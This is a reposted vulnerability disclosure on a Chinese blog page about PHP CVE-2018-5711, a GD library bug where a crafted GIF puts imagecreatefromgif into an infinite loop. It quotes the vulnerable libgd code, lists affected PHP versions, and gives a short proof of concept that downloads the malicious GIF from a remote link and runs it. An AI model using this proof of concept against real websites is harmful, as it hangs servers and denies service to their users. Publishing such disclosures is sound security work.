php cve 2018 5711,PHP CVE-2018-5711 – Hanging Websites by a Harmful GIF | 极安全-JiSec

最新推荐文章于 2022-04-02 15:30:38 发布

狗雄

最新推荐文章于 2022-04-02 15:30:38 发布

阅读量77

点赞数

文章标签： php cve 2018 5711

Author: Orange Tsai(@orange_8361) from DEVCORE

Recently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities.

This is an simple and interesting case, and seems easy to exploit in real world!

Affected

All PHP version

PHP 5 < 5.6.33

PHP 7.0 < 7.0.27

PHP 7.1 < 7.1.13

PHP 7.2 < 7.2.1

Vulnerability Details

The vulnerability is on the file ext/gd/libgd/gd_gif_in.c

There is a while-loop in LWZReadByte_

460 do {

461 sd->firstcode = sd->oldcode =

461 GetCode(fd, &sd->scd, sd->code_size, FALSE, ZeroDataBlockP);

463 } while (sd->firstcode == sd->clear_code);

Function GetCode is just a wrapper, and GetCode_ do the real stuff.

376 static int

377 GetCode_(gdIOCtx *fd, CODE_STATIC_DATA *scd, int code_size, int flag, int *ZeroDataBlockP)

378 {

379 int i, j, ret;

380 unsigned char count;

...

399 if ((count = GetDataBlock(fd, &scd->buf[2], ZeroDataBlockP)) <= 0)

400 scd->done = TRUE;

...

405 }

GetCode_ call GetDataBlock to read data from GIF!

332 static int

333 GetDataBlock_(gdIOCtx *fd, unsigned char *buf, int *ZeroDataBlockP)

334 {

335 unsigned char count;

336

336 if (! ReadOK(fd,&count,1)) {

338 return -1;

339 }

340

341 *ZeroDataBlockP = count == 0;

342

343 if ((count != 0) && (! ReadOK(fd, buf, count))) {

344 return -1;

345 }

346

347 return count;

348 }

OK, here are all vulnerable code, can you spot the vulnerability? 😛

The bug relied on the type conversion from int to unsigned char. As you can see:

If GetDataBlock_ return -1, scd->done in line 400 will set to True, and stop the while-loop. But it will never be executed because the definition of count is unsigned char, it’s always be a positive from 0 to 255.

So the result is, one single GIF can make an infinite loop and exhausted the server resource.

PoC

$ curl -L https://git.io/vN0n4 | xxd -r > poc.gif

$ php -r 'imagecreatefromgif("poc.gif");'

Infinite loop here...

It's easy to exploit in real world because lots of websites resize user-uploaded image by GD library...

Epilogue

I will disclose more 0-days in the future!

References

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
php cve 2018 5711,PHP CVE-2018-5711 – Hanging Websites by a Harmful GIF | 极安全-JiSec

Author: Orange Tsai(@orange_8361) fromDEVCORERecently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities.This is an simple and interesting case, and seems...
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。